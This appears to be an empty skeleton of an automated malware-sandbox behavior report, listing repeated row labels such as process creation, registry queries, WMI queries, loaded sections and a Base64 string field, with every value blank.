Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Base64 encoded string: |